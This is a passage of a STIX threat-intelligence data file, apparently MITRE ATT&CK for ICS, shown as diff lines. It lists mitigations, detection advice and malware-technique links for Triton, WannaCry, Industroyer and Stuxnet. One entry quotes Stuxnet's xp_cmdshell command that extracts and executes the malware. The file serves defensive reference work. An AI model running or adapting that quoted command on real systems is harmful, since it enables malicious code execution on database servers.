"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--1fc147bd-d6ab-4beb-908b-0fbe8e125b76", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.235Z", + "relationship_type": "mitigates", + "description": "Ensure users and user groups have appropriate permissions for their roles through Identity and Access Management (IAM) controls. Implement strict IAM controls to prevent access to systems except for the applications, users, and services that require access. Implement user accounts for each individual for enforcement and non-repudiation of actions.\n", + "source_ref": "course-of-action--e57ebc6d-785f-40c8-adb1-b5b5e09b3b48", + "target_ref": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--aa205915-7571-47ee-8bc6-5aa1ace86690", + "created": "2022-05-11T16:22:58.804Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T16:52:11.111Z", + "description": "Devices may produce alarms about restarts or shutdowns. Monitor for unexpected device restarts or shutdowns.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9d56be63-3501-4dd3-bb5f-63c580833298", + "target_ref": "attack-pattern--25dfc8ad-bd73-4dfd-84a9-3c3d383f76e9", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--75366cbf-e45f-4cfd-9e76-5af4dfe10766", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.080Z", + "relationship_type": "mitigates", + "description": "Execution prevention may block malicious software from accessing protected resources through the command line interface.\n", + "source_ref": "course-of-action--4fa717d9-cabe-47c8-8cdd-86e9e2e37f30", + "target_ref": "attack-pattern--24a9253e-8948-4c98-b751-8e2aee53127c", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--6ad39b3a-a962-457f-852c-be7fc615e22f", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Department of Homeland Security October 2009", + "description": "Department of Homeland Security 2009, October Developing an Industrial Control Systems Cybersecurity Incident Response Capability Retrieved. 2020/09/17 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/final-RP_ics_cybersecurity_incident_response_100609.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-19T21:23:00.355Z", + "description": "Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise. Maintain and exercise incident response plans (Citation: Department of Homeland Security October 2009), including the management of gold-copy back-up images and configurations for key systems to enable quick recovery and response from adversarial activities that impact control, view, or availability.\n", + "relationship_type": "mitigates", + "source_ref": "course-of-action--ad12819e-3211-4291-b360-069f280cff0a", + "target_ref": "attack-pattern--a81696ef-c106-482c-8f80-59c30f2569fb", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--fcb7733f-553d-43de-a8c6-c85a5cd65041", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.111Z", + "relationship_type": "mitigates", + "description": "Segment externally facing servers and services from the rest of the network with a DMZ or on separate hosting infrastructure.\n", + "source_ref": "course-of-action--1e7ccfc0-94c8-496e-8d27-032120892291", + "target_ref": "attack-pattern--32632a95-6856-47b9-9ab7-fea5cd7dce00", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--ba010007-6dde-4c9d-8452-69527cd1c2ba", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.091Z", + "relationship_type": "mitigates", + "description": "Minimize permissions and access for service accounts to limit the information that may be exposed or collected by malicious users or software. (Citation: National Institute of Standards and Technology April 2013)\n", + "source_ref": "course-of-action--622fe4d4-0e8e-4d17-9c25-6c9cef1f15d5", + "target_ref": "attack-pattern--3405891b-16aa-4bd7-bd7c-733501f9b20f", + "external_references": [ + { + "source_name": "National Institute of Standards and Technology April 2013", + "description": "National Institute of Standards and Technology 2013, April Security and Privacy Controls for Federal Information Systems and Organizations Retrieved. 2020/09/17 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r4.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--a74c14e2-eb8a-47bb-b64d-20aad9154297", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.218Z", + "relationship_type": "mitigates", + "description": "Segment operational network and systems to restrict access to critical system functions to predetermined management systems. (Citation: Department of Homeland Security September 2016)\n", + "source_ref": "course-of-action--1e7ccfc0-94c8-496e-8d27-032120892291", + "target_ref": "attack-pattern--b9160e77-ea9e-4ba9-b1c8-53a3c466b13d", + "external_references": [ + { + "source_name": "Department of Homeland Security September 2016", + "description": "Department of Homeland Security 2016, September Retrieved. 2020/09/25 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--5714c88f-ca54-46b6-b072-cd1d24714ae0", + "created": "2022-09-29T14:28:08.703Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-29T14:28:08.703Z", + "description": "Ensure embedded controls and network devices are protected through access management, as these devices often have unknown hardcoded accounts which could be used to gain unauthorized access.", + "relationship_type": "mitigates", + "source_ref": "course-of-action--3992ce42-43e9-4bea-b8db-a102ec3ec1e3", + "target_ref": "attack-pattern--c9a8d958-fcdb-40d2-af4c-461c8031651a", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--93e24e03-6425-4ee8-99bb-c3a662c6cdce", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "DHS CISA February 2019", + "description": "DHS CISA 2019, February 27 MAR-17-352-01 HatManSafety System Targeted Malware (Update B) Retrieved. 2019/03/08 ", + "url": "https://ics-cert.us-cert.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%20-%20Safety%20System%20Targeted%20Malware%20%28Update%20B%29.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T18:27:42.104Z", + "description": "[Triton](https://attack.mitre.org/software/S1009) is able to read, write and execute code in memory on the safety controller at an arbitrary address within the devices firmware region. This allows the malware to make changes to the running firmware in memory and modify how the device operates. (Citation: DHS CISA February 2019)", + "relationship_type": "uses", + "source_ref": "malware--80099a91-4c86-4bea-9ccb-dac55d61960e", + "target_ref": "attack-pattern--b9160e77-ea9e-4ba9-b1c8-53a3c466b13d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--10e87e4b-a231-42e3-a011-0031f8226936", + "created": "2022-09-26T17:15:51.819Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T17:15:51.819Z", + "description": "Monitor for firmware changes which may be observable via operational alarms from devices.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9d56be63-3501-4dd3-bb5f-63c580833298", + "target_ref": "attack-pattern--b9160e77-ea9e-4ba9-b1c8-53a3c466b13d", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--3ed98d8c-de30-499e-9a62-eae0207519f4", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.092Z", + "relationship_type": "mitigates", + "description": "Ensure embedded controls and network devices are protected through access management, as these devices often have unknown default accounts which could be used to gain unauthorized access.\n", + "source_ref": "course-of-action--3992ce42-43e9-4bea-b8db-a102ec3ec1e3", + "target_ref": "attack-pattern--8bb4538f-f16f-49f0-a431-70b5444c7349", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--8b491011-322d-4e0b-8f79-449e1b2ee185", + "created": "2022-05-11T16:22:58.805Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:55:26.030Z", + "description": "Monitor newly constructed processes that assist in lateral tool transfers, such as file transfer programs.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077", + "target_ref": "attack-pattern--ead7bd34-186e-4c79-9a4d-b65bcce6ed9d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--c59a3d89-c8fa-4c5d-813e-f4495d892d1a", + "created": "2019-03-25T19:13:54.947Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Joe Slowik April 2019", + "description": "Joe Slowik 2019, April 10 Implications of IT Ransomware for ICS Environments Retrieved. 2019/10/27 ", + "url": "https://dragos.com/blog/industry-news/implications-of-it-ransomware-for-ics-environments/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T18:32:08.109Z", + "description": "[WannaCry](https://attack.mitre.org/software/S0366) initially infected IT networks, but by means of an exploit (particularly the SMBv1-targeting MS17-010 vulnerability) spread to industrial networks. (Citation: Joe Slowik April 2019)", + "relationship_type": "uses", + "source_ref": "malware--75ecdbf1-c2bb-4afc-a3f9-c8da4de8c661", + "target_ref": "attack-pattern--85a45294-08f1-4539-bf00-7da08aa7b0ee", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--3d676c1b-2650-4599-8a57-790c55f9977d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.109Z", + "relationship_type": "mitigates", + "description": "Minimize the exposure of API calls that allow the execution of code.\n", + "source_ref": "course-of-action--4fa717d9-cabe-47c8-8cdd-86e9e2e37f30", + "target_ref": "attack-pattern--5a2610f6-9fff-41e1-bc27-575ca20383d4", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--7041d8e5-3b74-402a-86b3-fd59def80632", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.135Z", + "relationship_type": "mitigates", + "description": "Hot-standbys in diverse locations can ensure continued operations if the primarily system are compromised or unavailable. At the network layer, protocols such as the Parallel Redundancy Protocol can be used to simultaneously use redundant and diverse communication over a local network. (Citation: M. Rentschler and H. Heine)\n", + "source_ref": "course-of-action--f0f5c87a-a58d-440a-b3b5-ca679d98c6dd", + "target_ref": "attack-pattern--a81696ef-c106-482c-8f80-59c30f2569fb", + "external_references": [ + { + "source_name": "M. Rentschler and H. Heine", + "description": "M. Rentschler and H. Heine The Parallel Redundancy Protocol for industrial IP networks Retrieved. 2020/09/25 ", + "url": "https://ieeexplore.ieee.org/document/6505877" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--8baa4d55-c235-44da-b6fe-8866cf7f9915", + "created": "2022-05-11T16:22:58.803Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T15:08:06.789Z", + "description": "Monitor application logs for changes to settings and other events associated with network protocols that may be used to block communications.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa", + "target_ref": "attack-pattern--3f1f4ccb-9be2-4ff8-8f69-dd972221169b", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--d16e8909-d055-4174-aeb1-22c0613b2f73", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-21T13:53:55.028Z", + "description": "Disable unnecessary legacy network protocols that may be used for AiTM if applicable.\n", + "relationship_type": "mitigates", + "source_ref": "course-of-action--d0909119-2f71-4923-87db-b649881672d7", + "target_ref": "attack-pattern--9a505987-ab05-4f46-a9a6-6441442eec3b", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--69576d3c-d0e8-459e-9f2e-0b9c560b2e04", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.218Z", + "relationship_type": "mitigates", + "description": "Example mitigations could include minimizing its distribution/storage or obfuscating the information (e.g., facility coverterms, codenames). In many cases this information may be necessary to support critical engineering, maintenance, or operational functions, therefore, it may not be feasible to implement.\n", + "source_ref": "course-of-action--99c746d7-a08a-4169-94f9-b8c0dad716fa", + "target_ref": "attack-pattern--b7e13ee8-182c-4f19-92a4-a88d7d855d54", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--578117b2-0f4b-4d75-a2dc-3ee45976e616", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Department of Homeland Security October 2009", + "description": "Department of Homeland Security 2009, October Developing an Industrial Control Systems Cybersecurity Incident Response Capability Retrieved. 2020/09/17 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/final-RP_ics_cybersecurity_incident_response_100609.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-19T21:22:50.001Z", + "description": "Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise. Maintain and exercise incident response plans (Citation: Department of Homeland Security October 2009), including the management of gold-copy back-up images and configurations for key systems to enable quick recovery and response from adversarial activities that impact control, view, or availability.\n", + "relationship_type": "mitigates", + "source_ref": "course-of-action--ad12819e-3211-4291-b360-069f280cff0a", + "target_ref": "attack-pattern--1af9e3fd-2bcc-414d-adbd-fe3b95c02ca1", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--44c6bc32-d2e5-42f5-8c2e-42f305cb589b", + "created": "2022-09-27T19:06:12.301Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-27T19:06:12.302Z", + "description": "A manipulated I/O image requires analyzing the application program running on the PLC for specific data block writes. Detecting this requires obtaining and analyzing a PLC’s application program, either directly from the device or from asset management platforms.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--8ed4e6d0-56d7-4e6b-8fa6-41f41631f30d", + "target_ref": "attack-pattern--36e9f5bc-ac13-4da4-a2f4-01f4877d9004", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--2ff82993-5010-4450-89e7-341f449f3263", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.092Z", + "relationship_type": "mitigates", + "description": "Consider periodic reviews of accounts and privileges for critical and sensitive repositories.\n", + "source_ref": "course-of-action--bcf91ebc-f316-4e19-b2f6-444e9940c697", + "target_ref": "attack-pattern--3405891b-16aa-4bd7-bd7c-733501f9b20f", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--446c95ea-5178-4ae9-8f92-cb20dd50f7de", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-04-13T12:36:26.506Z", + "modified": "2022-05-06T17:47:24.166Z", + "relationship_type": "mitigates", + "description": "Minimize the exposure of API calls that allow the execution of code.\n", + "source_ref": "course-of-action--4fa717d9-cabe-47c8-8cdd-86e9e2e37f30", + "target_ref": "attack-pattern--b52870cc-83f3-473c-b895-72d91751030b", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--21b6ec9c-8779-49db-bf19-90e81893a6e4", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.089Z", + "relationship_type": "mitigates", + "description": "Protect files stored locally with proper permissions to limit opportunities for adversaries to impact data storage. (Citation: National Institute of Standards and Technology April 2013)\n", + "source_ref": "course-of-action--f9fcb3ec-6de0-4559-8cd9-ef1c0c7d1971", + "target_ref": "attack-pattern--493832d9-cea6-4b63-abe7-9a65a6473675", + "external_references": [ + { + "source_name": "National Institute of Standards and Technology April 2013", + "description": "National Institute of Standards and Technology 2013, April Security and Privacy Controls for Federal Information Systems and Organizations Retrieved. 2020/09/17 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r4.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--9d6f9bba-dd79-4cb6-a0f3-1284e58a6236", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Anton Cherepanov, ESET June 2017", + "description": "Anton Cherepanov, ESET 2017, June 12 Win32/Industroyer: A new threat for industrial control systems Retrieved. 2017/09/15 ", + "url": "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-23T18:53:56.368Z", + "description": "[Industroyer](https://attack.mitre.org/software/S0604)'s data wiper component removes the registry image path throughout the system and overwrites all files, rendering the system unusable. (Citation: Anton Cherepanov, ESET June 2017)", + "relationship_type": "uses", + "source_ref": "malware--e401d4fe-f0c9-44f0-98e6-f93487678808", + "target_ref": "attack-pattern--138979ba-0430-4de6-a128-2fc0b056ba36", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--dadfed22-d70c-482b-9026-964396d75484", + "created": "2022-05-11T16:22:58.805Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:42:28.053Z", + "description": "Monitor for behaviors on the endpoint system that might indicate successful compromise, such as abnormal behaviors of browser processes. This could include suspicious files written to disk.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077", + "target_ref": "attack-pattern--7830cfcf-b268-4ac0-a69e-73c6affbae9a", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--c195a0e9-d46c-487f-9a96-b138e9ca05d2", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.204Z", + "relationship_type": "mitigates", + "description": "Consider restricting access to email within critical process environments. Additionally, downloads and attachments may be disabled if email is still necessary.\n", + "source_ref": "course-of-action--143b4398-3222-480a-b6a4-e131bc2d3144", + "target_ref": "attack-pattern--648f995e-9c3a-41e4-aeee-98bb41037426", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--70113c21-85f2-4232-8755-233f93864277", + "created": "2022-05-11T16:22:58.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-27T19:17:12.033Z", + "description": "Monitor processes and command-line arguments to see if critical processes are terminated or stop running. For added context on adversary procedures and background see [Service Stop](https://attack.mitre.org/techniques/T1489).", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--61f1d40e-f3d0-4cc6-aa2d-937b6204194f", + "target_ref": "attack-pattern--063b5b92-5361-481a-9c3f-95492ed9a2d8", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--6baa9172-04e4-416d-a009-668cda23fd5d", + "created": "2021-10-08T15:25:32.143Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Nicolas Falliere, Liam O Murchu, Eric Chien February 2011", + "description": "Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22 ", + "url": "https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-19T17:13:18.889Z", + "description": "[Stuxnet](https://attack.mitre.org/software/S0603) will store and execute SQL code that will extract and execute Stuxnet from the saved CAB file using xp_cmdshell with the following command: `set @s = master..xp _ cmdshell extrac32 /y +@t+ +@t+x; exec(@s);` (Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)", + "relationship_type": "uses", + "source_ref": "malware--088f1d6e-0783-47c6-9923-9c79b2af43d4", + "target_ref": "attack-pattern--24a9253e-8948-4c98-b751-8e2aee53127c", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--7d2db896-3051-483c-bc53-ca21832ee085", + "created": "2022-05-11T16:22:58.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:47:23.983Z", + "description": "Monitor network traffic for suspicious email attachments. Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns (e.g., monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)). Use web proxies to review content of emails including sender information, headers, and attachments for potentially malicious content.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--648f995e-9c3a-41e4-aeee-98bb41037426", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--4b98b72c-a093-4917-a21b-a0b4f388e98e", + "created": "2023-03-31T17:45:09.659Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Dragos Crashoverride 2018", + "description": "Joe Slowik. (2018, October 12). Anatomy of an Attack: Detecting and 